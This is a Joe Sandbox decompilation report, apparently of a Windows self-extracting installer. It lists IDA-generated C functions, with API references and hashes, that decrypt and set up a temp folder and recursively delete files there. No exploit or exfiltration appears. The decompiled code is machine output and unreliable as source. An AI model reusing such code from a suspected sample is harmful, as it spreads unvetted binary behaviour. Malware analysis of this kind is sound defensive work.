                                                                                                                                                                                                                                              					_t14 = E00A855A0(_t53); // executed
                                                                                                                                                                                                                                              					if(_t14 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t45 = 0x105;
                                                                                                                                                                                                                                              						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                              						_t43 = 0x105;
                                                                                                                                                                                                                                              						_t40 =  &_v272;
                                                                                                                                                                                                                                              						E00A8658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                              						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                              						_t44 = 0;
                                                                                                                                                                                                                                              						if(_t36 != 0) {
                                                                                                                                                                                                                                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                              							_v276 = _t31;
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								_t45 = _t47;
                                                                                                                                                                                                                                              								_t40 = _t31;
                                                                                                                                                                                                                                              								 *0xa8a288("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                                                              								_v276();
                                                                                                                                                                                                                                              								if(_t47 != _t47) {
                                                                                                                                                                                                                                              									_t40 = 4;
                                                                                                                                                                                                                                              									asm("int 0x29");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						FreeLibrary(_t36);
                                                                                                                                                                                                                                              						_t58 =  *0xa88a24 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                                                              							if(_t21 != 0) {
                                                                                                                                                                                                                                              								__eflags =  *0xa88a2c - _t44; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									__eflags =  *0xa88d48 & 0x000000c0;
                                                                                                                                                                                                                                              									if(( *0xa88d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              										_t41 =  *0xa89a40; // 0x3, executed
                                                                                                                                                                                                                                              										_t26 = E00A8256D(_t41); // executed
                                                                                                                                                                                                                                              										_t44 = _t26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t22 =  *0xa88a24; // 0x0
                                                                                                                                                                                                                                              									 *0xa89a44 = _t44;
                                                                                                                                                                                                                                              									__eflags = _t22;
                                                                                                                                                                                                                                              									if(_t22 != 0) {
                                                                                                                                                                                                                                              										L26:
                                                                                                                                                                                                                                              										__eflags =  *0xa88a38;
                                                                                                                                                                                                                                              										if( *0xa88a38 == 0) {
                                                                                                                                                                                                                                              											__eflags = _t22;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												E00A84169(__eflags);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t12 = 1;
                                                                                                                                                                                                                                              										goto L17;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags =  *0xa89a30 - _t22; // 0x0
                                                                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                                                                              											goto L26;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t25 = E00A83BA2(); // executed
                                                                                                                                                                                                                                              										__eflags = _t25;
                                                                                                                                                                                                                                              										if(_t25 == 0) {
                                                                                                                                                                                                                                              											goto L16;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t22 =  *0xa88a24; // 0x0
                                                                                                                                                                                                                                              										goto L26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t27 = E00A83B26(_t40, _t44);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t43 = 0x4bc;
                                                                                                                                                                                                                                              							E00A844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                              							 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t59 =  *0xa89a30 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E00A8621E(); // executed
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t49 =  *0xa88a24;
                                                                                                                                                                                                                                              				if( *0xa88a24 != 0) {
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					_t34 = E00A83A3F(_t51);
                                                                                                                                                                                                                                              					_t52 = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E00A851E5(_t49) == 0) {
                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t51 =  *0xa88a38;
                                                                                                                                                                                                                                              				if( *0xa88a38 != 0) {
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                                                                              			}




























                                                                                                                                                                                                                                              0x00a82f1d
                                                                                                                                                                                                                                              0x00a82f28
                                                                                                                                                                                                                                              0x00a82f2f
                                                                                                                                                                                                                                              0x00a82f3d
                                                                                                                                                                                                                                              0x00a82f6c
                                                                                                                                                                                                                                              0x00a82f6c
                                                                                                                                                                                                                                              0x00a82f71
                                                                                                                                                                                                                                              0x00a82f73
                                                                                                                                                                                                                                              0x00a83041
                                                                                                                                                                                                                                              0x00a83041
                                                                                                                                                                                                                                              0x00a83043
                                                                                                                                                                                                                                              0x00a83053
                                                                                                                                                                                                                                              0x00a83053
                                                                                                                                                                                                                                              0x00a82f79
                                                                                                                                                                                                                                              0x00a82f80
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82f86
                                                                                                                                                                                                                                              0x00a82f86
                                                                                                                                                                                                                                              0x00a82f93
                                                                                                                                                                                                                                              0x00a82f9e
                                                                                                                                                                                                                                              0x00a82fa0
                                                                                                                                                                                                                                              0x00a82fa6
                                                                                                                                                                                                                                              0x00a82fb8
                                                                                                                                                                                                                                              0x00a82fba
                                                                                                                                                                                                                                              0x00a82fbe
                                                                                                                                                                                                                                              0x00a82fc6
                                                                                                                                                                                                                                              0x00a82fcc
                                                                                                                                                                                                                                              0x00a82fd4
                                                                                                                                                                                                                                              0x00a82fd6
                                                                                                                                                                                                                                              0x00a82fd8
                                                                                                                                                                                                                                              0x00a82fe0
                                                                                                                                                                                                                                              0x00a82fe6
                                                                                                                                                                                                                                              0x00a82fee
                                                                                                                                                                                                                                              0x00a82ff0
                                                                                                                                                                                                                                              0x00a82ff5
                                                                                                                                                                                                                                              0x00a82ff5
                                                                                                                                                                                                                                              0x00a82fee
                                                                                                                                                                                                                                              0x00a82fd4
                                                                                                                                                                                                                                              0x00a82ff8
                                                                                                                                                                                                                                              0x00a82ffe
                                                                                                                                                                                                                                              0x00a83004
                                                                                                                                                                                                                                              0x00a83017
                                                                                                                                                                                                                                              0x00a8301c
                                                                                                                                                                                                                                              0x00a83024
                                                                                                                                                                                                                                              0x00a83054
                                                                                                                                                                                                                                              0x00a8305a
                                                                                                                                                                                                                                              0x00a83065
                                                                                                                                                                                                                                              0x00a83065
                                                                                                                                                                                                                                              0x00a8306c
                                                                                                                                                                                                                                              0x00a8306e
                                                                                                                                                                                                                                              0x00a83075
                                                                                                                                                                                                                                              0x00a8307a
                                                                                                                                                                                                                                              0x00a8307a
                                                                                                                                                                                                                                              0x00a8307c
                                                                                                                                                                                                                                              0x00a83081
                                                                                                                                                                                                                                              0x00a83087
                                                                                                                                                                                                                                              0x00a83089
                                                                                                                                                                                                                                              0x00a830a1
                                                                                                                                                                                                                                              0x00a830a1
                                                                                                                                                                                                                                              0x00a830a9
                                                                                                                                                                                                                                              0x00a830ab
                                                                                                                                                                                                                                              0x00a830ad
                                                                                                                                                                                                                                              0x00a830af
                                                                                                                                                                                                                                              0x00a830af
                                                                                                                                                                                                                                              0x00a830ad
                                                                                                                                                                                                                                              0x00a830b6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8308b
                                                                                                                                                                                                                                              0x00a8308b
                                                                                                                                                                                                                                              0x00a83091
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83093
                                                                                                                                                                                                                                              0x00a83098
                                                                                                                                                                                                                                              0x00a8309a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8309c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8309c
                                                                                                                                                                                                                                              0x00a83089
                                                                                                                                                                                                                                              0x00a8305c
                                                                                                                                                                                                                                              0x00a83061
                                                                                                                                                                                                                                              0x00a83063
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83063
                                                                                                                                                                                                                                              0x00a8302b
                                                                                                                                                                                                                                              0x00a83032
                                                                                                                                                                                                                                              0x00a8303c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8303c
                                                                                                                                                                                                                                              0x00a83006
                                                                                                                                                                                                                                              0x00a8300c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8300e
                                                                                                                                                                                                                                              0x00a83015
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83015
                                                                                                                                                                                                                                              0x00a82f80
                                                                                                                                                                                                                                              0x00a82f3f
                                                                                                                                                                                                                                              0x00a82f46
                                                                                                                                                                                                                                              0x00a82f5f
                                                                                                                                                                                                                                              0x00a82f5f
                                                                                                                                                                                                                                              0x00a82f64
                                                                                                                                                                                                                                              0x00a82f66
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82f66
                                                                                                                                                                                                                                              0x00a82f4f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82f55
                                                                                                                                                                                                                                              0x00a82f5d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A82F93
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A82FB2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A82FC6
                                                                                                                                                                                                                                              • DecryptFileA.ADVAPI32 ref: 00A82FE6
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A82FF8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A8301C
                                                                                                                                                                                                                                                • Part of subcall function 00A851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A82F4D,?,00000002,00000000), ref: 00A85201
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 2126469477-2099937843
                                                                                                                                                                                                                                              • Opcode ID: 15d8e1b523c57d9de81e905b18a3ca79db289d02cdf4136756da210fa9ace652
                                                                                                                                                                                                                                              • Instruction ID: d95ee68f1880ceac49d72871174c22768bce405801635c700b81df1e4f9c199d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15d8e1b523c57d9de81e905b18a3ca79db289d02cdf4136756da210fa9ace652
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8419932A002059ADF34FBB59D4977A73B8FB54F95F040566E941C2191EF78CE82CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00A82390(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v280;
                                                                                                                                                                                                                                              				char _v284;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              				int _t36;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                              				_t21 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                              				_t65 = __ecx;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_pop(_t62);
                                                                                                                                                                                                                                              					_pop(_t66);
                                                                                                                                                                                                                                              					_pop(_t46);
                                                                                                                                                                                                                                              					return E00A86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A81680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                              					_t58 = 0x104;
                                                                                                                                                                                                                                              					E00A816B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                              					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                              					_t63 = _t22;
                                                                                                                                                                                                                                              					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t58 = 0x104;
                                                                                                                                                                                                                                              						E00A81680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                              						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							_t58 = 0x104;
                                                                                                                                                                                                                                              							E00A816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                              							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                              							DeleteFileA( &_v280);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                              								E00A816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                              								_t58 = 0x104;
                                                                                                                                                                                                                                              								E00A8658A( &_v280, 0x104, 0xa81140);
                                                                                                                                                                                                                                              								E00A82390( &_v284);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                              					} while (_t36 != 0);
                                                                                                                                                                                                                                              					FindClose(_t63); // executed
                                                                                                                                                                                                                                              					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                              0x00a82398
                                                                                                                                                                                                                                              0x00a8239e
                                                                                                                                                                                                                                              0x00a823a3
                                                                                                                                                                                                                                              0x00a823a5
                                                                                                                                                                                                                                              0x00a823ae
                                                                                                                                                                                                                                              0x00a823b3
                                                                                                                                                                                                                                              0x00a824cb
                                                                                                                                                                                                                                              0x00a824d2
                                                                                                                                                                                                                                              0x00a824d3
                                                                                                                                                                                                                                              0x00a824d4
                                                                                                                                                                                                                                              0x00a824df
                                                                                                                                                                                                                                              0x00a823c2
                                                                                                                                                                                                                                              0x00a823d1
                                                                                                                                                                                                                                              0x00a823db
                                                                                                                                                                                                                                              0x00a823e4
                                                                                                                                                                                                                                              0x00a823f6
                                                                                                                                                                                                                                              0x00a823fc
                                                                                                                                                                                                                                              0x00a82401
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82407
                                                                                                                                                                                                                                              0x00a82407
                                                                                                                                                                                                                                              0x00a82408
                                                                                                                                                                                                                                              0x00a82411
                                                                                                                                                                                                                                              0x00a8241f
                                                                                                                                                                                                                                              0x00a8247a
                                                                                                                                                                                                                                              0x00a82483
                                                                                                                                                                                                                                              0x00a82495
                                                                                                                                                                                                                                              0x00a824a3
                                                                                                                                                                                                                                              0x00a82421
                                                                                                                                                                                                                                              0x00a8242f
                                                                                                                                                                                                                                              0x00a82453
                                                                                                                                                                                                                                              0x00a8245d
                                                                                                                                                                                                                                              0x00a82466
                                                                                                                                                                                                                                              0x00a82472
                                                                                                                                                                                                                                              0x00a82472
                                                                                                                                                                                                                                              0x00a8242f
                                                                                                                                                                                                                                              0x00a824af
                                                                                                                                                                                                                                              0x00a824b5
                                                                                                                                                                                                                                              0x00a824be
                                                                                                                                                                                                                                              0x00a824c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a824c5

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileA.KERNELBASE(?,00A88A3A,00A811F4,00A88A3A,00000000,?,?), ref: 00A823F6
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00A811F8), ref: 00A82427
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00A811FC), ref: 00A8243B
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A82495
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00A824A3
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A824AF
                                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 00A824BE
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(00A88A3A), ref: 00A824C5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836429354-0
                                                                                                                                                                                                                                              • Opcode ID: f6a12dfd022fffc7eefd27ec4fa742050632355a1f04f5cb1b6f37257ba83436
                                                                                                                                                                                                                                              • Instruction ID: 30fed6dd5bdcd8211b8592d0e6ea43cc065241d67190a769543af2f1facda231
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6a12dfd022fffc7eefd27ec4fa742050632355a1f04f5cb1b6f37257ba83436
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11318431604640ABD320FBA4DD8DBFB73ACBBD4305F04492EB59586190EB34994EC762
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                                                                              			E00A82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t7;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				signed char _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t4 = GetVersion();
                                                                                                                                                                                                                                              				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t17 = _t21;
                                                                                                                                                                                                                                              							 *0xa8a288(0, 1, 0, 0);
                                                                                                                                                                                                                                              							 *_t21();
                                                                                                                                                                                                                                              							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                              							if(_t24 != _t24) {
                                                                                                                                                                                                                                              								_t17 = 4;
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t20 = _a12;
                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                              				 *0xa89124 = 0;
                                                                                                                                                                                                                                              				if(E00A82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                              					_t9 = E00A82F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                              					_t22 = _t9; // executed
                                                                                                                                                                                                                                              					E00A852B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                              					if(_t22 != 0) {
                                                                                                                                                                                                                                              						_t32 =  *0xa88a3a; // 0x0
                                                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                                                              							_t19 =  *0xa89a2c; // 0x0
                                                                                                                                                                                                                                              							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              								E00A81F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t6 =  *0xa88588; // 0x0
                                                                                                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                                                                                                              					CloseHandle(_t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 =  *0xa89124; // 0x0
                                                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00a82c03
                                                                                                                                                                                                                                              0x00a82c0d
                                                                                                                                                                                                                                              0x00a82c18
                                                                                                                                                                                                                                              0x00a82c20
                                                                                                                                                                                                                                              0x00a82c2e
                                                                                                                                                                                                                                              0x00a82c32
                                                                                                                                                                                                                                              0x00a82c36
                                                                                                                                                                                                                                              0x00a82c3d
                                                                                                                                                                                                                                              0x00a82c43
                                                                                                                                                                                                                                              0x00a82c45
                                                                                                                                                                                                                                              0x00a82c47
                                                                                                                                                                                                                                              0x00a82c49
                                                                                                                                                                                                                                              0x00a82c4e
                                                                                                                                                                                                                                              0x00a82c4e
                                                                                                                                                                                                                                              0x00a82c47
                                                                                                                                                                                                                                              0x00a82c32
                                                                                                                                                                                                                                              0x00a82c20
                                                                                                                                                                                                                                              0x00a82c50
                                                                                                                                                                                                                                              0x00a82c54
                                                                                                                                                                                                                                              0x00a82c57
                                                                                                                                                                                                                                              0x00a82c64
                                                                                                                                                                                                                                              0x00a82c66
                                                                                                                                                                                                                                              0x00a82c6b
                                                                                                                                                                                                                                              0x00a82c6d
                                                                                                                                                                                                                                              0x00a82c74
                                                                                                                                                                                                                                              0x00a82c76
                                                                                                                                                                                                                                              0x00a82c7c
                                                                                                                                                                                                                                              0x00a82c7e
                                                                                                                                                                                                                                              0x00a82c87
                                                                                                                                                                                                                                              0x00a82c89
                                                                                                                                                                                                                                              0x00a82c89
                                                                                                                                                                                                                                              0x00a82c87
                                                                                                                                                                                                                                              0x00a82c7c
                                                                                                                                                                                                                                              0x00a82c74
                                                                                                                                                                                                                                              0x00a82c8e
                                                                                                                                                                                                                                              0x00a82c95
                                                                                                                                                                                                                                              0x00a82c98
                                                                                                                                                                                                                                              0x00a82c98
                                                                                                                                                                                                                                              0x00a82c9e
                                                                                                                                                                                                                                              0x00a82ca7

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersion.KERNEL32(?,00000002,00000000,?,00A86BB0,00A80000,00000000,00000002,0000000A), ref: 00A82C03
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A86BB0,00A80000,00000000,00000002,0000000A), ref: 00A82C18
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A82C28
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00A86BB0,00A80000,00000000,00000002,0000000A), ref: 00A82C98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                              • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 62482547-3460614246
